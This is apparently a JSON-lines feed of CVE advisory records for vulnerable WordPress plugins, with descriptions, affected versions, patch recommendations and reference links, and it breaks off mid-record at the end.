{"CVE_ID":"CVE-2024-13668","slug":"wordpress-activity-o-meter","versionImpact":"1","description":"The WordPress Activity O Meter WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admins.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a7bfc094-b235-419d-882d-96b439651f65\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a7bfc094-b235-419d-882d-96b439651f65\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-46533","slug":"landing-pages-and-domain-aliases","versionImpact":"0.8","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdrift.no Landing pages and Domain aliases for WordPress allows Stored XSS. This issue affects Landing pages and Domain aliases for WordPress: from n\/a through 0.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/landing-pages-and-domain-aliases\\\/vulnerability\\\/wordpress-landing-pages-and-domain-aliases-for-wordpress-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/landing-pages-and-domain-aliases\\\/vulnerability\\\/wordpress-landing-pages-and-domain-aliases-for-wordpress-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6713","slug":"pvn-auth-popup","versionImpact":"1.0.0","description":"The PVN Auth Popup WordPress plugin through 1.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/24685b19-0a44-411a-9e1b-d4d0627d7cb6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/24685b19-0a44-411a-9e1b-d4d0627d7cb6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1930","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized data deletion due to a missing capability check on the wpfc_clear_cache_of_allsites_callback function in versions up to, and including, 1.1.2. This makes it possible for authenticated attackers with subscriber-level access to delete caches.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bae67a68-4bd1-4b52-b3dd-af0eef014028?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bae67a68-4bd1-4b52-b3dd-af0eef014028?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2298","slug":"meeting-scheduler-by-vcita","versionImpact":"4.2.10","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'business_id' parameter in versions up to, and including, 4.2.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e6a0bf9-4767-4d4c-9a1e-adcb3c7719d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e6a0bf9-4767-4d4c-9a1e-adcb3c7719d9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-api-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-api-functions.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-29434","slug":"optin-forms","versionImpact":"1.3.1","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in FancyThemes Optin Forms \u2013 Simple List Building Plugin for WordPress plugin <=\u00a01.3.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/optin-forms\\\/wordpress-optin-forms-plugin-1-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/optin-forms\\\/wordpress-optin-forms-plugin-1-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4282","slug":"embedpress","versionImpact":"3.8.2","description":"The EmbedPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'admin_post_remove' and 'remove_private_data' functions in versions up to, and including, 3.8.2. This makes it possible for authenticated attackers with subscriber privileges or above, to delete plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2950211\\\/embedpress#file18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2950211\\\/embedpress#file18\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.8.2\\\/EmbedPress\\\/ThirdParty\\\/Googlecalendar\\\/Embedpress_Google_Helper.php#L801\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.8.2\\\/EmbedPress\\\/ThirdParty\\\/Googlecalendar\\\/Embedpress_Google_Helper.php#L801\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.8.2\\\/EmbedPress\\\/ThirdParty\\\/Googlecalendar\\\/Embedpress_Google_Helper.php#L807\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.8.2\\\/EmbedPress\\\/ThirdParty\\\/Googlecalendar\\\/Embedpress_Google_Helper.php#L807\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fa2ec9e-2859-4a96-9e33-9e22d37e544f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fa2ec9e-2859-4a96-9e33-9e22d37e544f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0514","slug":"royal-elementor-addons","versionImpact":"1.3.87","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the add_to_compare function. This makes it possible for unauthenticated attackers to add items to user compare lists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0955689-43a0-442c-974b-5db5e4171f6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0955689-43a0-442c-974b-5db5e4171f6a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5729","slug":"simple-al-slider","versionImpact":"1.2.10","description":"The Simple AL Slider WordPress plugin through 1.2.10 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0352f6f5-cdfd-4cef-9ed5-fdc1cbcb368a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0352f6f5-cdfd-4cef-9ed5-fdc1cbcb368a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8742","slug":"essential-addons-for-elementor-lite","versionImpact":"6.0.3","description":"The Essential Addons for Elementor \u2013 Best Elementor Addon, Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery widget in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76c292dc-e9da-4256-82df-58ac5def4771?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76c292dc-e9da-4256-82df-58ac5def4771?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/6.0.3\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L566\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/6.0.3\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L566\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148624\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148624\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9522","slug":"wp-users-masquerade","versionImpact":"2.0.0","description":"The WP Users Masquerade plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.0.0. This is due to incorrect authentication and capability checking in the 'ajax_masq_login' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in as any existing user on the site, such as an administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a4f0909-76f6-4d27-87b1-f6cd5f5cbbb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a4f0909-76f6-4d27-87b1-f6cd5f5cbbb7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-users-masquerade\\\/trunk\\\/masquerade.php?rev=1703860#L162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-users-masquerade\\\/trunk\\\/masquerade.php?rev=1703860#L162\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54233","slug":"advanced-control-manager","versionImpact":"2.16.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Enea Overclokk Advanced Control Manager for WordPress by ItalyStrap allows Reflected XSS.This issue affects Advanced Control Manager for WordPress by ItalyStrap: from n\/a through 2.16.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/advanced-control-manager\\\/vulnerability\\\/wordpress-advanced-control-manager-plugin-2-16-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/advanced-control-manager\\\/vulnerability\\\/wordpress-advanced-control-manager-plugin-2-16-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11337","slug":"horoscope-and-tarot","versionImpact":"1.3.0","description":"The Horoscope And Tarot plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'divine_horoscope' shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/horoscope-and-tarot\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/horoscope-and-tarot\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d833338-a343-446f-a3f1-cb5e2cff6585?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d833338-a343-446f-a3f1-cb5e2cff6585?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13405","slug":"apptivo-business-site","versionImpact":"5.3","description":"The Apptivo Business Site CRM plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.3. This is due to missing or incorrect nonce validation on the 'awp_ip_deny' page. This makes it possible for unauthenticated attackers to block IP addresses via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/apptivo-business-site\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/apptivo-business-site\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8225e3c-5413-4406-a31b-80829b6b330a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8225e3c-5413-4406-a31b-80829b6b330a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3832","slug":"fusedesk","versionImpact":"6.7","description":"The FuseDesk plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018successredirect\u2019 parameter in all versions up to, and including, 6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fusedesk\\\/trunk\\\/fusedesk.php#L516\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fusedesk\\\/trunk\\\/fusedesk.php#L516\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fusedesk\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fusedesk\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/baf12413-eb45-44c3-a6c9-f5a048d6500d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/baf12413-eb45-44c3-a6c9-f5a048d6500d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6712","slug":"mapfig-studio","versionImpact":"0.2.1","description":"The MapFig Studio WordPress plugin through 0.2.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0346b62c-a856-4554-a24a-ef2c2943bda9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0346b62c-a856-4554-a24a-ef2c2943bda9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4488","slug":"widgets-on-pages","versionImpact":"1.6.0","description":"The Widgets on Pages WordPress plugin through 1.6.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e52c18a9-550a-40b1-a413-0e06e5b4aabc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e52c18a9-550a-40b1-a413-0e06e5b4aabc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1929","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the wpfc_purgecache_varnish_callback function in versions up to, and including, 1.1.2. This makes it possible for authenticated attackers with subscriber-level access to purge the varnish cache.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3412","slug":"image-map-pro-lite","versionImpact":"1.0.0","description":"The Image Map Pro \u2013 Drag-and-drop Builder for Interactive Images \u2013 Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.0. This is due to a missing capability check on the ajax_store_save() function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify plugin settings and inject malicious web scripts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b58403df-af09-4d74-88e6-140e3f2f291b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b58403df-af09-4d74-88e6-140e3f2f291b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-map-pro-lite\\\/trunk\\\/image-map-pro-wordpress-lite.php#L410\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-map-pro-lite\\\/trunk\\\/image-map-pro-wordpress-lite.php#L410\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3452","slug":"canto","versionImpact":"3.0.4","description":"The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a76077c6-700a-4d21-a930-b0d6455d959c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a76077c6-700a-4d21-a930-b0d6455d959c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2951888\\\/canto\\\/trunk\\\/includes\\\/lib\\\/tree.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2951888\\\/canto\\\/trunk\\\/includes\\\/lib\\\/tree.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/canto\\\/trunk\\\/includes\\\/lib\\\/tree.php?rev=2841358#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/canto\\\/trunk\\\/includes\\\/lib\\\/tree.php?rev=2841358#L5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0513","slug":"royal-elementor-addons","versionImpact":"1.3.87","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the remove_from_wishlist function. This makes it possible for unauthenticated attackers to remove items from user wishlists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d3516e7-cce4-4def-be38-d16be3110d59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d3516e7-cce4-4def-be38-d16be3110d59?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5728","slug":"animated-al-list","versionImpact":"1.0.6","description":"The Animated AL List WordPress plugin through 1.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/287c4e8c-9092-4cb9-9642-e4f3d10f46fa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/287c4e8c-9092-4cb9-9642-e4f3d10f46fa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9519","slug":"userplus","versionImpact":"2.0","description":"The UserPlus plugin for WordPress is vulnerable to unauthorized modification of data due to an improper capability check on the 'save_metabox_form' function in versions up to, and including, 2.0. This makes it possible for authenticated attackers, with editor-level permissions or above, to update the registration form role to administrator, which leads to privilege escalation.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1148b18d-7af1-41c6-bd7f-1b2d53cb44e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1148b18d-7af1-41c6-bd7f-1b2d53cb44e6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-post-metaboxes.php?rev=1627771#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-post-metaboxes.php?rev=1627771#L62\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11290","slug":"member-access","versionImpact":"1.1.6","description":"The Member Access plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.6 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/member-access\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/member-access\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4c7c448-fe9d-496d-84f2-0da8d1e13d64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4c7c448-fe9d-496d-84f2-0da8d1e13d64?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13390","slug":"admin-form","versionImpact":"1.9.1","description":"The ADFO \u2013 Custom data in admin dashboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'adfo_list' shortcode in all versions up to, and including, 1.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-form\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-form\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38537a5e-7e36-4c94-9d27-59a53dada47b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38537a5e-7e36-4c94-9d27-59a53dada47b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2481","slug":"mediaview","versionImpact":"1.1.2","description":"The MediaView plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018id' parameter in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mediaview\\\/tags\\\/1.1.2\\\/inc\\\/forms\\\/addMedia.inc.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mediaview\\\/tags\\\/1.1.2\\\/inc\\\/forms\\\/addMedia.inc.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mediaview\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mediaview\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca2d687f-0358-4642-849b-100bf40cbbf1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca2d687f-0358-4642-849b-100bf40cbbf1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3793","slug":"buddy-press-force-password-change","versionImpact":"0.1","description":"The Buddypress Force Password Change plugin for WordPress is vulnerable to authenticated account takeover due to the plugin not properly validating a user's identity prior to updating their password through the 'bp_force_password_ajax' function in all versions up to, and including, 0.1. This makes it possible for authenticated attackers, with subscriber-level access and above and under certain prerequisites, to change arbitrary user's passwords, including administrators, and leverage that to gain access to their accounts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 